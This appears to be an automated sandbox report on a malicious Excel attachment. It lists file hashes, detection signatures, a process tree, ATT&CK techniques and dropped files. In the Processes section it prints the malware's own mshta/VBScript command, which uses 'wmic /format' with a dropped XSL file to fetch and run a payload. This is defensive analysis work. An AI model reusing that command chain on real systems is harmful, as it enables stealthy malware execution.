Overview

overview

10

Static

static

8

Reciept 0198478.xlsb

windows7_x64

10

Reciept 0198478.xlsb

windows10_x64

9

Analysis

  • max time kernel
    136s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-07-2021 15:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Reciept 0198478.xlsb

  • Size

    67KB

  • MD5

    16b275e48c1d27c448b4ed772206315c

  • SHA1

    317988ea2f7fa8fa288850adce94bf2543bbd8d0

  • SHA256

    d032d57e8f366c59979f536722b5cfbded08b94fc032da27220df46dfcd43208

  • SHA512

    518b238dee5d8f69ab2f09a92f7daf12613358b21bbc38247e6e9faa45470eb450815d7a094dddc0dfc8db7b4698da27e76480258c9b7feb61f0c73e1cf04c50

Score
9/10
cryptonepacker

Malware Config

Signatures

  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Reciept 0198478.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4448
  • \??\c:\windows\system32\mshta.EXE
    c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogSeriesAxes.xsl"" & Chr(34)),0:close")
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\System32\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogSeriesAxes.xsl"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2428
      • C:\Windows\Temp\tu3py.exe
        "C:\Windows\Temp\tu3py.exe"
        3⤵
        • Executes dropped EXE
        PID:2836

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\qDialogSeriesAxes.xsl
    MD5

    ed9a97566e5179a4793dad89b79f3c8b

    SHA1

    3aba6229322c12118a7999b35387045159429078

    SHA256

    c6ce5cf41a799c6c427a8facae15fa9ac40eb3562132189c72e1398178c74981

    SHA512

    08f827a3bea007feae33e69f43a09cfcb08f0f636d1eab3d937203bad63d94cd9f99312f162cefb1217e115d5ae3985b6202f2b773212134c540e01fe2d071f1

    Download Submit
  • C:\Windows\Temp\tu3py.exe
    MD5

    9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

    SHA1

    d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

    SHA256

    b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

    SHA512

    c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    Download Submit
  • C:\Windows\Temp\tu3py.exe
    MD5

    9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

    SHA1

    d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

    SHA256

    b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

    SHA512

    c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    Download Submit
  • memory/2428-179-0x0000000000000000-mapping.dmp
    Download
  • memory/2836-181-0x0000000000000000-mapping.dmp
    Download
  • memory/4448-117-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4448-122-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4448-123-0x000001B6A2740000-0x000001B6A4635000-memory.dmp
    Filesize

    31.0MB

    Download
  • memory/4448-121-0x00007FF9D41C0000-0x00007FF9D52AE000-memory.dmp
    Filesize

    16.9MB

    Download
  • memory/4448-118-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4448-114-0x00007FF67F260000-0x00007FF682816000-memory.dmp
    Filesize

    53.7MB

    Download
  • memory/4448-116-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
    Filesize

    64KB

    Download
  • memory/4448-115-0x00007FF9B3A10000-0x00007FF9B3A20000-memory.dmp
    Filesize

    64KB

    Download